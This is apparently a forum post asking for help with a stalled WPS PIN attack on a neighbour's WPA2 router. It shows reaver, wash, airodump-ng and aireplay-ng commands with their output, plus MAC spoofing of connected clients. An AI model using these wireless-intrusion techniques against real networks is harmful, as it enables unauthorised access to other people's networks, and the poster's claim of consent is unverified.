I have successfully cracked a WPA2 network at work using reaver, of course in order to see if it is locked I had to check it with wash, I was able to do this only after mkdir /etc/reaver/.
However, when I'm trying to breach my neighbour (who's aware of this) this is the result of wash.
And the result of airodump-ng mon0 -c 1Code:root@kali:~# wash -i mon0 -C Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------
Code:BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:xx:xx:xx:xx -51 100 86 0 0 1 54e. WPA2 CCMP PSK xxxxxxxxx
Standard Reaver command results in "switching mon0 to channel1" which lasts forever.
Then I'm going more hardcore with -L and -A and I get to another infinite loop:Code:root@kali:~# reaver -i mon0 -b xx;xx:xx:xx:xx:xx -vv Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [+] Waiting for beacon from xx:xx:xx:xx:xx:xx [+] Switching mon0 to channel 1
I've tested tons of variations, still nothing.Code:root@kali:~# reaver -i mon0 -b xx;xx:xx:xx:xx:xx -vv -L -A Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [+] Waiting for beacon from xx:xx:xx;xx:xx:xx [+] Switching mon0 to channel 1 [+] Associated with xx:xx;xx;xx:xx (ESSID: xxxxxxxxxxxxxx) [+] Trying pin 12345670 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request
Aireplay-ng -9 mon0 results:
Code:root@kali:~# aireplay-ng -9 mon0 10:49:41 Trying broadcast probe requests... 10:49:41 Injection is working! 10:49:42 Found 1 AP 10:49:42 Trying directed probe requests... 10:49:42 00:xx:xx:xx:xx:xx - channel: 1 - 'xxxxxxxxx' 10:49:43 Ping (min/avg/max): 1.553ms/9.367ms/124.480ms Power: -72.50 10:49:43 30/30: 100%
Aireplay injection test
aireplay-ng -9 -e xxxxxx -a 00:xx:xx:xx:xx:xx -i wlan1 wlan0
And I can't do anything about it...Code:root@kali:~# aireplay-ng -9 -e xxxxxxxxxxxx -a 0x:xx:xx:xx:xx:xx -i wlan1 wlan0 10:55:01 Waiting for beacon frame (BSSID: 00:xx:xx:xx:xx:xx) on channel 1 10:55:01 Trying broadcast probe requests... 10:55:01 Injection is working! 10:55:03 Found 1 AP 10:55:03 Trying directed probe requests... 10:55:03 xx:xx:xx;xx:xx:xx - channel: 1 - 'xxxxxxxxx' 10:55:03 Ping (min/avg/max): 1.134ms/8.493ms/73.599ms Power: -39.57 10:55:03 30/30: 100% 10:55:03 Trying card-to-card injection... 10:55:03 Attack -0: OK 10:55:03 Attack -1 (open): OK 10:55:03 Attack -1 (psk): OK 10:55:03 Attack -2/-3/-4/-6: OK 10:55:03 Attack -5/-7: OK
I'm using 2 wireless cards, Atheros AR9285 and Atheros AR9271.
airmon-ng check kill doesn't help either.
Spoofing card's mac(I've got the mac of 2 PCs which are connected to this network, tried to reaver it when they were disconnected) on both wlan0/mon0 and wlan1 and adding --mac=spoofedmac in reaver doesn't give me anything new.
I have also tried to update
apt-get install libcap-dev
apt-get install libsqlite3-dev
Any suggestions?
